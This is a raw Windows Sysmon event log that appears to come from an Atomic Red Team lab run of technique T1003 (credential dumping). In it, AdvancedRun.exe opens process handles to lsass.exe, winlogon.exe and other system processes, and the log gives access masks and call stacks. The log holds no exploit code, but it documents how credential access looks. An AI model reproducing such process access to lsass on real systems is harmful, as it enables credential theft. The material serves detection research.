17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003967443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 534500x80000000000000003967441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003967440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 